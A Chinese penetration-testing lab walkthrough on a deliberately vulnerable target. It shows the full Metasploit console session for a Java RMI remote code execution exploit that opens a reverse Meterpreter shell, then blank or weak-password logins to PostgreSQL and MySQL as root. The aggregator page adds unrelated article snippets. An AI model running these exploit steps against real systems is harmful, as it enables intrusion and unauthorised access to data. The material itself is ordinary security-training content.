fiona_xlh
fiona_xlh

渗透测试靶机实战---系统篇03

(续) 渗透测试靶机实战---02

7. Java RMI Server Insecure Default Configuration Remote Code Execution Vulnerability

msf5 exploit(linux/misc/drb_remote_codeexec) > search java_RMI 

Matching Modules
================

   #  Name                                            Disclosure Date  Rank       Check  Description
   -  ----                                            ---------------  ----       -----  -----------
   0  auxiliary/gather/java_rmi_registry                               normal     No     Java RMI Registry Interfaces Enumeration
   1  auxiliary/scanner/misc/java_rmi_server          2011-10-15       normal     Yes    Java RMI Server Insecure Endpoint Code Execution Scanner
   2  exploit/multi/browser/java_rmi_connection_impl  2010-03-31       excellent  No     Java RMIConnectionImpl Deserialization Privilege Escalation
   3  exploit/multi/misc/java_rmi_server              2011-10-15       excellent  No     Java RMI Server Insecure Default Configuration Java Code Execution


msf5 exploit(linux/misc/drb_remote_codeexec) > use exploit/multi/misc/java_rmi_server
msf5 exploit(multi/misc/java_rmi_server) > show info

       Name: Java RMI Server Insecure Default Configuration Java Code Execution
     Module: exploit/multi/misc/java_rmi_server
   Platform: Java, Linux, OSX, Solaris, Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2011-10-15

Provided by:
  mihi

Available targets:
  Id  Name
  --  ----
  0   Generic (Java Payload)
  1   Windows x86 (Native Payload)
  2   Linux x86 (Native Payload)
  3   Mac OS X PPC (Native Payload)
  4   Mac OS X x86 (Native Payload)

Check supported:
  No

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  HTTPDELAY  10               yes       Time that the HTTP Server will wait for the payload request
  RHOSTS                      yes       The target address range or CIDR identifier
  RPORT      1099             yes       The target port (TCP)
  SRVHOST    0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0
  SRVPORT    8080             yes       The local port to listen on.
  SSL        false            no        Negotiate SSL for incoming connections
  SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
  URIPATH                     no        The URI to use for this exploit (default is random)

Payload information:
  Avoid: 0 characters

Description:
  This module takes advantage of the default configuration of the RMI 
  Registry and RMI Activation services, which allow loading classes 
  from any remote (HTTP) URL. As it invokes a method in the RMI 
  Distributed Garbage Collector which is available via every RMI 
  endpoint, it can be used against both rmiregistry and rmid, and 
  against most other (custom) RMI endpoints as well. Note that it does 
  not work against Java Management Extension (JMX) ports since those 
  do not support remote class loading, unless another RMI endpoint is 
  active in the same Java process. RMI method calls do not support or 
  require any sort of authentication.

References:
  http://download.oracle.com/javase/1.3/docs/guide/rmi/spec/rmi-protocol.html
  http://www.securitytracker.com/id?1026215
  https://cvedetails.com/cve/CVE-2011-3556/

msf5 exploit(multi/misc/java_rmi_server) > set RHOSTS 192.168.10.149
RHOSTS => 192.168.10.149
msf5 exploit(multi/misc/java_rmi_server) > run

[*] Started reverse TCP handler on 192.168.11.135:4444 
[*] 192.168.10.149:1099 - Using URL: http://0.0.0.0:8080/7LJx65WYnvMx
[*] 192.168.10.149:1099 - Local IP: http://192.168.11.135:8080/7LJx65WYnvMx
[*] 192.168.10.149:1099 - Server started.
[*] 192.168.10.149:1099 - Sending RMI Header...
[*] 192.168.10.149:1099 - Sending RMI Call...
[*] 192.168.10.149:1099 - Replied to request for payload JAR
[*] Sending stage (53845 bytes) to 192.168.10.149
[*] Meterpreter session 3 opened (192.168.11.135:4444 -> 192.168.10.149:33325) at 2019-10-12 17:29:09 +0800
[*] 192.168.10.149:1099 - Server stopped.

meterpreter > whoami
[-] Unknown command: whoami.
meterpreter > cd /
meterpreter > ls
Listing: /
==========

Mode              Size     Type  Last modified              Name
----              ----     ----  -------------              ----
100667/rw-rw-rwx  138      fil   2019-10-12 16:10:34 +0800  .aMndSYRKN0SFWvXN
40666/rw-rw-rw-   4096     dir   2012-05-14 11:35:33 +0800  bin
40666/rw-rw-rw-   1024     dir   2012-05-14 11:36:28 +0800  boot
40666/rw-rw-rw-   4096     dir   2010-03-17 06:55:51 +0800  cdrom
40666/rw-rw-rw-   13440    dir   2019-10-12 09:20:55 +0800  dev
40666/rw-rw-rw-   4096     dir   2019-10-12 16:04:38 +0800  etc
40666/rw-rw-rw-   4096     dir   2010-04-16 14:16:02 +0800  home
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:40 +0800  initrd
100666/rw-rw-rw-  7929183  fil   2012-05-14 11:35:56 +0800  initrd.img
40666/rw-rw-rw-   4096     dir   2012-05-14 11:35:22 +0800  lib
40666/rw-rw-rw-   16384    dir   2010-03-17 06:55:15 +0800  lost+found
40666/rw-rw-rw-   4096     dir   2010-03-17 06:55:52 +0800  media
40666/rw-rw-rw-   4096     dir   2010-04-29 04:16:56 +0800  mnt
100666/rw-rw-rw-  14672    fil   2019-10-12 16:10:35 +0800  nohup.out
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:39 +0800  opt
40666/rw-rw-rw-   0        dir   2019-10-12 09:20:18 +0800  proc
40666/rw-rw-rw-   4096     dir   2019-10-12 09:21:07 +0800  root
40666/rw-rw-rw-   4096     dir   2012-05-14 09:54:53 +0800  sbin
40666/rw-rw-rw-   4096     dir   2010-03-17 06:57:38 +0800  srv
40666/rw-rw-rw-   0        dir   2019-10-12 09:20:19 +0800  sys
40666/rw-rw-rw-   4096     dir   2019-10-12 16:25:12 +0800  tmp
40666/rw-rw-rw-   4096     dir   2010-04-28 12:06:37 +0800  usr
40666/rw-rw-rw-   4096     dir   2010-03-17 22:08:23 +0800  var
100666/rw-rw-rw-  1987288  fil   2008-04-11 00:55:41 +0800  vmlinuz

meterpreter >

利用metasplit可以直接进入系统如上;

 

8. PostgreSQL weak password

渗透测试靶机实战---系统篇03_第1张图片

openVAS已经扫出了用户名/密码,使用mputty的登录方式如下,可以正常进入系统。

渗透测试靶机实战---系统篇03_第2张图片

 

 

9.MySQL / MariaDB weak password

渗透测试靶机实战---系统篇03_第3张图片

连接进入系统的方式如下:

root@kali:~#  mysql -u root -p -h 192.168.10.149 -P 3306
Enter password:
Welcome to the MariaDB monitor.  Commands end with ; or \g.
Your MySQL connection id is 543
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.

Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.

MySQL [(none)]> show databases
    -> ;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.05 sec)

MySQL [(none)]>

上面让输入密码的地方,直接敲击Enter键就可以了,通过show databases命令可以系统所有的databases显示出来。

 

(未完待续) 渗透测试靶机实战---04

你可能感兴趣的:(渗透测试)

  • 2025年渗透测试面试题总结-2025年HW(护网面试) 43(题目+回答) 独行soc 2025年护网面试职场和发展linux科技渗透测试安全护网
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)431.自我介绍与职业规划2.Webshell源码级检测方案3.2025年新型Web漏洞TOP54.渗透中的高价值攻击点5.智能Fuzz平台架构设计6.堆栈溢出攻防演进7.插桩技术实战应用8.二进制安全能力矩阵9.C语言内存管理精要10.Pyth
  • 混合云工具沦为隐蔽的远程代码执行与权限提升载体 FreeBuf- flaskpython后端
    通过WAC执行命令时分配的令牌权限|图片来源:IBM混合云管理工具的安全隐患IBMX-Force团队近日对微软AzureArc进行深入研究,发现这款旨在统一本地与云环境的混合云管理工具,可能成为代码执行、权限提升和隐蔽驻留的潜在攻击载体。这项研究始于IBM红队在一次渗透测试中,偶然发现PowerShell脚本中硬编码的Azure服务主体(ServicePrincipal)密钥,进而触发对Azure
  • 2025年渗透测试面试题总结-字节跳动[实习]安全研究员(题目+回答) 独行soc 2025年渗透测试面试指南安全科技区块链linux职场和发展渗透测试网络安全
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录字节跳动[实习]安全研究员1.你投的岗位是安全研究实习生,你了解我们这边主要是做什么的吗2.自我介绍3.现在有什么比较想做的方向吗?4.有没有审过开源框架、cms、中间件之类的?6.在A公司主要做什么的?7.入侵检测主要在做什么?遇到的问题?核心工作:典型问题:8.误报原
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 40(题目+回答)
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)401.SQL注入读写文件/二次注入/防御2.XSS类型及防御3.CSRF与XSS区别4.文件上传绕过与防御5.服务器解析漏洞6.XXE与SSRF7.RCE与PHP函数区别8.Python迭代器与装饰器9.缓冲区溢出原理/防御10.内网渗透经验1
  • 想转行网络安全,可以先看看过来人的建议 孤独的汤姆 web安全安全
    在当前就业形势下,不少朋友面临转行的困境。网络安全作为一个热门领域,自然也吸引了许多人的目光。本文将就转行网络安全这一话题,提供一些切实可行的建议。网络安全行业概况网络安全涵盖了从基础的脚本编写到高级的漏洞研究等多个层面。该领域包括但不限于:渗透测试、漏洞评估、恶意软件分析、入侵检测、信息安全管理等。这些内容的复杂性不一,从基础的安全监控到复杂的安全架构设计都涉及其中。这就意味着,尽管有些领域可能
  • [晕事]今天做了件晕事83: pen test mzhan017 英语学习笔记晕事英语学习
    这个缩写,就不能顾名思义了,而且pen是一个独立的单词,从读音上来说还容易和pain混淆,所以导致初接触者有些困扰。所以这个pentest的缩写,有些失败。全写是penetrationtest:渗透测试。https://en.wikipedia.org/wiki/Penetration_test修改建议是改成penetest,至少可以和pen在书写上区分,在读音是也可以区分,就读“排你test”。
  • 基于python的api扫描器系统的设计与实现
    博主介绍:✌在职Java研发工程师、专注于程序设计、源码分享、技术交流、专注于Java技术领域和毕业设计✌温馨提示:文末有CSDN平台官方提供的老师Wechat/QQ名片:)Java精品实战案例《700套》2025最新毕业设计选题推荐:最热的500个选题o( ̄▽ ̄)d介绍在当今数字化社会,网络安全问题日益突出,为了有效识别和防范网络威胁,开发一款全面的Web应用渗透测试系统至关重要。本研究基于Py
  • 网络渗透2 指纹识别 郭莉914 网络安全web安全
    一.指纹识别指纹由于其终身不变性、唯一性和方便性,几乎已成为生物特征识别的代名词。通常我们说的指纹就是人的手指末端正面皮肤上凹凸不平的纹线,纹线规律的排列形成不同的纹型。而本节所讲的指纹是指网站CMS指纹识别、计算机操作系统及Web容器的指纹识别等。在渗透测试中,对目标服务器进行指纹识别是相当有必要的,因为只有识别出相应的Web容器或者CMS,才能查找与其相关的漏洞,然后才能进行相应的渗透操作。C
  • 网络安全/Web安全/渗透测试入门/信息收集 &Sinnt& 网络安全web安全网络安全
    网络安全/Web安全/渗透测试入门/信息收集本篇文章主要讲解如何进行信息收集,列举了在信息收集中常见的工具和手段。原文地址:sinblog一,whois查询WHOIS查询是一种查找域名注册信息的工具或服务。WHOIS是一个协议,允许用户查询某个域名或IP地址的域名、注册信息以及其他相关互联网的详细数据。WHOIS数据库由多个注册商提供和注册机构维护,公开提供域名注册人的信息。自己购买一个域名,配置
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 31(题目+回答) 独行soc 2025年护网面试职场和发展安全linux护网渗透测试
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)311.自我介绍2.渗透测试流程(五阶段模型)3.技术栈与开发经历4.自动化挖洞实践5.信息搜集方法论6.深度漏洞挖掘案例8.SQL注入实战技巧9.AWVS扫描与防御10.CSRFvsSSRF核心差异11.SSRF正则绕过技术12.虚拟主机识别原
  • 2025版最新渗透测试入门教程,从零基础入门到精通,从看这篇开始! Python_chichi 网络安全安全系统安全web安全
    目录渗透测试:不只是找Bug,更是“攻心”?渗透测试“十八般武艺”:你练哪一种?渗透测试“套路”深:六大流派,谁是天下第一?(待续)渗透测试兵器谱:神兵利器大盘点(待续)渗透测试实战演习:看我如何“偷”走你的秘密(待续)从小白到大神:渗透测试修炼手册前言:别再啃那些枯燥的教科书了!想入行网络安全?想玩转渗透测试?别再抱着那些过时的教程死记硬背了!这玩意儿,光靠理论可不行,得结合实战,还得有点“玄学
  • Linux安装及常用指令
    一、Linux安装简述1.常见Linux发行版发行版特点Ubuntu最流行,用户友好,社区支持强,适合新手CentOS/RockyLinux企业级稳定版本,适合服务器Debian稳定、安全,适合开发或服务器ArchLinux极简、自由度高,适合进阶用户KaliLinux渗透测试专用2.安装方式✅推荐:虚拟机安装(安全、不破坏主系统)工具:VMware/VirtualBox安装流程:下载ISO镜像(
  • 渗透测试中 phpinfo() 的信息利用分析 vortex5 web安全php网络安全渗透测试web安全
    在渗透测试中,phpinfo()是一个非常常见却极具价值的信息泄露点。这个函数的本意是向开发者展示当前PHP环境的详细配置情况,包括编译选项、扩展模块、环境变量、系统信息、目录路径等。然而一旦该页面被暴露到互联网上,攻击者便可以借此收集大量目标系统的重要信息,从而为后续的漏洞利用、权限提升、提权横向等行为打下基础。本文将从实战角度分析phpinfo()页面中各类信息的渗透利用方式。一、系统与服务器
  • 如何用三层防护体系打造坚不可摧的 API 安全堡垒?
    url:/posts/0bbb4a455ef36bf6f81ac97189586fda/title:如何用三层防护体系打造坚不可摧的API安全堡垒?date:2025-07-03T18:55:04+08:00lastmod:2025-07-03T18:55:04+08:00author:cmdragonsummary:FastAPI安全与认证综合实战涵盖了JWT认证、OAuth2集成和渗透测试等内
  • kali Linux root密码修改 luozhonghua2000 渗透测试linux运维服务器kali
    kaliroot密码修改有时候是经常发生的,要么忘记,要么是必须限时要改的,今天记录下,修改方法,以便后续。KaliLinux的前身是BackTrackLinux发行版。KaliLinux是一个基于Debian的Linux发行版,它被认为是最好的渗透测试的Linux发行版之一,而且名副其实。作为一名从事渗透测试的人员,不懂KaliLinux的话,就out了。它他预装了数百种享誉盛名的渗透工具,使你
  • 2025年渗透测试 vs 漏洞扫描:本质区别与协同防御实战指南 上海云盾商务经理杨杨 安全网络
    引言2025年,随着AI驱动的自适应攻击与量子计算威胁升级,企业对安全评估的需求激增。然而,渗透测试(PenetrationTesting)与漏洞扫描(VulnerabilityScanning)仍被大量混淆——前者年成本超百万仍一票难求,后者自动化率突破90%却误报率居高不下。本文从技术本质、演进趋势与实战场景切入,解析二者差异及协同策略。一、本质区别:五维对比框架维度渗透测试漏洞扫描核心目标模
  • Python 进攻性渗透测试(一)
    原文:annas-archive.org/md5/dccde1d96c9ad81f97529d78e3e69c9b译者:飞龙协议:CCBY-NC-SA4.0序言Python是一种易学的跨平台编程语言,具有无限的第三方库。许多开源黑客工具都是用Python编写的,可以轻松地集成到你的脚本中。本书被分成了清晰的小部分,你可以按照自己的节奏学习,并专注于对你最有兴趣的领域。你将学会如何编写自己的脚本,并
  • TryHackMe-进攻性渗透测试-09_Internal Sugobet apache服务器网络安全web安全jenkins
    Internal工作范围客户要求工程师对提供的虚拟环境进行外部、Web应用程序和内部评估。客户要求提供有关评估的最少信息,希望从恶意行为者的眼睛进行参与(黑盒渗透测试)。客户端要求您保护两个标志(未提供位置)作为利用证明:user.txtroot.txt此外,客户还提供了以下范围津贴:确保修改主机文件以反映内部文件.thm此参与中允许使用任何工具或技术找到并记下发现的所有漏洞将发现的标志提交到仪表
  • TryHackMe-进攻性渗透测试-02_Alfred
    Alfred在这个房间里,我们将学习如何利用广泛使用的自动化服务器上的常见错误配置(Jenkins-此工具用于创建持续集成/持续开发管道,允许开发人员在更改代码后自动部署其代码)。之后,我们将使用一种有趣的权限提升方法来获得完整的系统访问权限。由于这是一个Windows应用程序,我们将使用Nishinang来获得初始访问权限。存储库包含一组有用的脚本,用于初始访问、枚举和权限提升。在本例中,我们将
  • Python用于进攻性渗透测试教程 董宙帆
    Python用于进攻性渗透测试教程Python-for-Offensive-PenTestPythonforOffensivePenTest,publishedbyPackt项目地址:https://gitcode.com/gh_mirrors/py/Python-for-Offensive-PenTest本教程旨在指导您了解并使用Python-for-Offensive-PenTest这一开源项
  • Python 进攻性渗透测试(二)
    原文:annas-archive.org/md5/dccde1d96c9ad81f97529d78e3e69c9b译者:飞龙协议:CCBY-NC-SA4.0第四章:追捕我吧!在今天的世界里,绕过和劫持软件在互联网上到处都是。然而,明确的使用和执行方式才是让你成为一名优秀的业余黑客的关键。这可以通过正确选择工具并遵循必要的过程,完美地完成手头的任务来实现。在本章中,我们将涵盖以下主题,帮助你实现这一
  • [ 渗透测试面试篇 ] 渗透测试面试题大集合(详解)(4-2)XSS注入相关面试题 寒蝉听雨[原ID_PowerShell] 面试总结渗透测试自学篇渗透测试面试分享渗透测试升职加薪网络安全XSS注入面试题网络安全面试题1024程序员节
    博主介绍‍博主介绍:大家好,我是_PowerShell,很高兴认识大家~✨主攻领域:【渗透领域】【数据通信】【通讯安全】【web安全】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!渗透方向的岗位,涉及到的知识点是很广泛的。这里我总结了整个一系列的面试题,可能没有覆盖到全部的知识面,但是应该是比较全面的
  • 史上最全的CTF保姆教程 从入门到入狱【带工具】 最爱吃南瓜 网络安全web安全windows
    下面分享的资源包含国内9套教程教程1-CTF从入门到提升四周学习视频教程教程2-信息安全CTF比赛培训教程教程3-CTF从入门到提升教程4-CTF培训web网络安全基础入门渗透测试教程教程5-CTF入门课程教程6-CTF夺旗全套视频教程教程7-网络安全课程新手入门必看教程8-bugku_CTF_Web视频教程网络安全预科班课程CTF入门国外3套教程国外教程1套-GoogleCTF2018Begin
  • 高效主机发现与端口枚举:fscan工具实战指南 Bruce_xiaowei 笔记总结经验网络安全fscan信息搜集
    高效主机发现与端口枚举:fscan工具实战指南在网络安全领域,主机发现与端口枚举是渗透测试和信息收集的基础环节。本文将深入探讨fscan这一高效工具的核心技术原理与实战应用,帮助你快速掌握网络扫描的核心技能。一、fscan与Nmap工具对比特性fscanNmap开发语言Python3C++主要功能主机探测、端口扫描、漏洞检测主机发现、服务识别、OS检测爆破能力内置弱口令检测需配合其他工具扫描速度极
  • 车联网网络安全渗透测试:深度解析与实践 ke0hly web安全网络安全物联网安全架构安全威胁分析
    引言随着汽车智能化、网联化程度的不断深入,车联网(IoV)已成为连接人、车、路、云的关键枢纽。然而,技术进步的同时也带来了前所未有的网络安全挑战。从车载系统到云端平台,从车内通信到V2X通信,车联网的每一个环节都可能成为潜在的攻击面,一旦被恶意利用,将直接威胁到驾乘人员的生命财产安全,甚至影响国家安全和公共秩序。因此,构建一套全面、深入、实战化的车联网网络安全渗透测试流程和方法,对于保障车联网的健
  • 《网络攻防技术》《数据分析与挖掘》《网络体系结构与安全防护》这三个研究领域就业如何? 扣棣编程 其他网络数据分析安全
    这几个研究领域都是当前信息技术领域的热点方向,就业前景总体来说都非常不错,但各有侧重和特点。我来帮你详细分析一下:1.网络攻防技术就业前景:非常火热且持续增长。核心方向:渗透测试、漏洞挖掘与分析、恶意软件分析、入侵检测/防御、应急响应、威胁情报、安全审计、红蓝对抗等。市场需求:极高。数字化转型深入、网络攻击日益频繁和复杂(勒索软件、APT攻击、供应链攻击等)、数据安全与隐私保护法规(如GDPR、中
  • Web API 渗透测试指南 江左盟宗主 WEB渗透从入门到精通WebAPI渗透测试WebAPI
    概述API(ApplicationProgrammingInterface,应用程序编程接口)是一个允许不同软件应用程序之间进行通信和数据交换的接口。API定义了一组规则和协议,软件开发者可以使用这些规则和协议来访问操作系统、库、服务或其他应用程序的功能。API的基本概念接口(Interface):API提供了一组公开的方法和端点,供外部系统调用。这些方法和端点通常通过URL、函数名或服务名称来表
  • 渗透测试/漏洞赏金/src/黑客自学指南
    Web渗透测试方法论方法论概要在此方法论中我们的目标范围仅是一个域名或一个子域名,因此你应当针对你测试范围内的每一个不确定其web服务的域名,子域名或ip进行测试1.首先确定web服务器所使用的技术,其次如果你成功识别到技术,那么接下来要知道如何利用检索的信息。·该技术版本有任何已知的漏洞吗·使用的是常规的技术吗?有什么有用的技巧以此来检索更多的信息?·有没有针对某种技术的专用的扫描器可以用?比如
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 16(题目+回答) 独行soc 2025年护网面试职场和发展web安全安全linux渗透测试护网
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)161.渗透测试步骤2.信息收集方法3.常用扫描器优缺点4.Burp破解MD5/Base64加密密码5.常见HTTP方法及区别6.常见状态码含义7.请求头作用8.响应头作用9.Cookie的Secure和HttpOnly属性10.渗透常用编码11
  • 2025年渗透测试面试题总结-2025年HW(护网面试) 15(题目+回答) 独行soc 2025年护网面试职场和发展web安全安全linux渗透测试网络安全
    安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。目录2025年HW(护网面试)151.实习经历2.CNVD证书类型3.登录窗口渗透测试流程4.验证码绕过实战手法技术型绕过(自动化)逻辑型绕过(手动测试)5.WAF绕过能力说明6.职业发展规划7.技术成长周期8.漏洞复现与运营2025年HW(护网面试)151、有没有实习过?在
  • TOMCAT在POST方法提交参数丢失问题 357029540 javatomcatjsp
    摘自http://my.oschina.net/luckyi/blog/213209 昨天在解决一个BUG时发现一个奇怪的问题,一个AJAX提交数据在之前都是木有问题的,突然提交出错影响其他处理流程。 检查时发现页面处理数据较多,起初以为是提交顺序不正确修改后发现不是由此问题引起。于是删除掉一部分数据进行提交,较少数据能够提交成功。 恢复较多数据后跟踪提交FORM DATA ,发现数
  • 在MyEclipse中增加JSP模板 删除-2008-08-18 ljy325 jspxmlMyEclipse
    在D:\Program Files\MyEclipse 6.0\myeclipse\eclipse\plugins\com.genuitec.eclipse.wizards_6.0.1.zmyeclipse601200710\templates\jsp  目录下找到Jsp.vtl,复制一份,重命名为jsp2.vtl,然后把里面的内容修改为自己想要的格式,保存。 然后在 D:\Progr
  • JavaScript常用验证脚本总结 eksliang JavaScriptjavaScript表单验证
         转载请出自出处:http://eksliang.iteye.com/blog/2098985        下面这些验证脚本,是我在这几年开发中的总结,今天把他放出来,也算是一种分享吧,现在在我的项目中也在用!包括日期验证、比较,非空验证、身份证验证、数值验证、Email验证、电话验证等等...! &nb
  • 微软BI(4) 18289753290 微软BI SSIS
    1) Q:查看ssis里面某个控件输出的结果:  A MessageBox.Show(Dts.Variables["v_lastTimestamp"].Value.ToString()); 这是我们在包里面定义的变量 2):在关联目的端表的时候如果是一对多的关系,一定要选择唯一的那个键作为关联字段。 3) Q:ssis里面如果将多个数据源的数据插入目的端一
  • 定时对大数据量的表进行分表对数据备份 酷的飞上天空 大数据量
    工作中遇到数据库中一个表的数据量比较大,属于日志表。正常情况下是不会有查询操作的,但如果不进行分表数据太多,执行一条简单sql语句要等好几分钟。。   分表工具:linux的shell + mysql自身提供的管理命令 原理:使用一个和原表数据结构一样的表,替换原表。   linux shell内容如下: =======================开始 
  • 本质的描述与因材施教 永夜-极光 感想随笔
             不管碰到什么事,我都下意识的想去探索本质,找寻一个最形象的描述方式。        我坚信,世界上对一件事物的描述和解释,肯定有一种最形象,最贴近本质,最容易让人理解        &
  • 很迷茫。。。 随便小屋 随笔
    小弟我今年研一,也是从事的咱们现在最流行的专业(计算机)。本科三流学校,为了能有个更好的跳板,进入了考研大军,非常有幸能进入研究生的行业(具体学校就不说了,怕把学校的名誉给损了)。   先说一下自身的条件,本科专业软件工程。主要学习就是软件开发,几乎和计算机没有什么区别。因为学校本身三流,也就是让老师带着学生学点东西,然后让学生毕业就行了。对专业性的东西了解的非常浅。就那学的语言来说
  • 23种设计模式的意图和适用范围 aijuans 设计模式
    Factory Method 意图 定义一个用于创建对象的接口,让子类决定实例化哪一个类。Factory Method 使一个类的实例化延迟到其子类。   适用性 当一个类不知道它所必须创建的对象的类的时候。   当一个类希望由它的子类来指定它所创建的对象的时候。   当类将创建对象的职责委托给多个帮助子类中的某一个,并且你希望将哪一个帮助子类是代理者这一信息局部化的时候。 Abstr
  • Java中的synchronized和volatile aoyouzi javavolatilesynchronized
    说到Java的线程同步问题肯定要说到两个关键字synchronized和volatile。说到这两个关键字,又要说道JVM的内存模型。JVM里内存分为main memory和working memory。 Main memory是所有线程共享的,working memory则是线程的工作内存,它保存有部分main memory变量的拷贝,对这些变量的更新直接发生在working memo
  • js数组的操作和this关键字 百合不是茶 js数组操作this关键字
    js数组的操作;   一:数组的创建: 1、数组的创建 var array = new Array(); //创建一个数组 var array = new Array([size]); //创建一个数组并指定长度,注意不是上限,是长度 var arrayObj = new Array([element0[, element1[, ...[, elementN]]]
  • 别人的阿里面试感悟 bijian1013 面试分享工作感悟阿里面试
    原文如下:http://greemranqq.iteye.com/blog/2007170         一直做企业系统,虽然也自己一直学习技术,但是感觉还是有所欠缺,准备花几个月的时间,把互联网的东西,以及一些基础更加的深入透析,结果这次比较意外,有点突然,下面分享一下感受吧!    &nb
  • 淘宝的测试框架Itest Bill_chen springmaven框架单元测试JUnit
    Itest测试框架是TaoBao测试部门开发的一套单元测试框架,以Junit4为核心, 集合DbUnit、Unitils等主流测试框架,应该算是比较好用的了。 近期项目中用了下,有关itest的具体使用如下: 1.在Maven中引入itest框架: <dependency>   <groupId>com.taobao.test</groupId&g
  • 【Java多线程二】多路条件解决生产者消费者问题 bit1129 java多线程
    package com.tom; import java.util.LinkedList; import java.util.Queue; import java.util.concurrent.ThreadLocalRandom; import java.util.concurrent.locks.Condition; import java.util.concurrent.loc
  • 汉字转拼音pinyin4j 白糖_ pinyin4j
    以前在项目中遇到汉字转拼音的情况,于是在网上找到了pinyin4j这个工具包,非常有用,别的不说了,直接下代码:   import java.util.HashSet; import java.util.Set; import net.sourceforge.pinyin4j.PinyinHelper; import net.sourceforge.pinyin
  • org.hibernate.TransactionException: JDBC begin failed解决方案 bozch ssh数据库异常DBCP
    org.hibernate.TransactionException: JDBC begin failed:     at org.hibernate.transaction.JDBCTransaction.begin(JDBCTransaction.java:68)    at org.hibernate.impl.SessionImp
  • java-并查集(Disjoint-set)-将多个集合合并成没有交集的集合 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.ut
  • Java PrintWriter打印乱码 chenbowen00 java
    一个小程序读写文件,发现PrintWriter输出后文件存在乱码,解决办法主要统一输入输出流编码格式。 读文件: BufferedReader 从字符输入流中读取文本,缓冲各个字符,从而提供字符、数组和行的高效读取。 可以指定缓冲区的大小,或者可使用默认的大小。大多数情况下,默认值就足够大了。 通常,Reader 所作的每个读取请求都会导致对基础字符或字节流进行相应的读取请求。因
  • [天气与气候]极端气候环境 comsci 环境
          如果空间环境出现异变...外星文明并未出现,而只是用某种气象武器对地球的气候系统进行攻击,并挑唆地球国家间的战争,经过一段时间的准备...最大限度的削弱地球文明的整体力量,然后再进行入侵......      那么地球上的国家应该做什么样的防备工作呢?  &n
  • oracle order by与union一起使用的用法 daizj UNIONoracleorder by
    当使用union操作时,排序语句必须放在最后面才正确,如下: 只能在union的最后一个子查询中使用order by,而这个order by是针对整个unioning后的结果集的。So: 如果unoin的几个子查询列名不同,如 Sql代码  select supplier_id, supplier_name  from suppliers  UNI
  • zeus持久层读写分离单元测试 deng520159 单元测试
    本文是zeus读写分离单元测试,距离分库分表,只有一步了.上代码: 1.ZeusMasterSlaveTest.java package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.j
  • Yii 截取字符串(UTF-8) 使用组件 dcj3sjt126com yii
    1.将Helper.php放进protected\components文件夹下。 2.调用方法:   Helper::truncate_utf8_string($content,20,false);   //不显示省略号  Helper::truncate_utf8_string($content,20);  //显示省略号  &n
  • 安装memcache及php扩展 dcj3sjt126com PHP
    安装memcache    tar zxvf memcache-2.2.5.tgz     cd memcache-2.2.5/     /usr/local/php/bin/phpize (?)    ./configure --with-php-confi
  • JsonObject 处理日期 feifeilinlin521 javajsonJsonOjbectJsonArrayJSONException
        写这边文章的初衷就是遇到了json在转换日期格式出现了异常 net.sf.json.JSONException: java.lang.reflect.InvocationTargetException  原因是当你用Map接收数据库返回了java.sql.Date 日期的数据进行json转换出的问题话不多说  直接上代码  &n
  • Ehcache(06)——监听器 234390216 监听器listenerehcache
    监听器          Ehcache中监听器有两种,监听CacheManager的CacheManagerEventListener和监听Cache的CacheEventListener。在Ehcache中,Listener是通过对应的监听器工厂来生产和发生作用的。下面我们将来介绍一下这两种类型的监听器。  
  • activiti 自带设计器中chrome 34版本不能打开bug的解决 jackyrong Activiti
      在acitivti modeler中,如果是chrome 34,则不能打开该设计器,其他浏览器可以, 经证实为bug,参考 http://forums.activiti.org/content/activiti-modeler-doesnt-work-chrome-v34 修改为,找到 oryx.debug.js 在最头部增加 if (!Document.
  • 微信收货地址共享接口-终极解决 laotu5i0 微信开发
       最近要接入微信的收货地址共享接口,总是不成功,折腾了好几天,实在没办法网上搜到的帖子也是骂声一片。我把我碰到并解决问题的过程分享出来,希望能给微信的接口文档起到一个辅助作用,让后面进来的开发者能快速的接入,而不需要像我们一样苦逼的浪费好几天,甚至一周的青春。各种羞辱、谩骂的话就不说了,本人还算文明。    如果你能搜到本贴,说明你已经碰到了各种 ed
  • 关于人才 netkiller.github.com 工作面试招聘netkiller人才
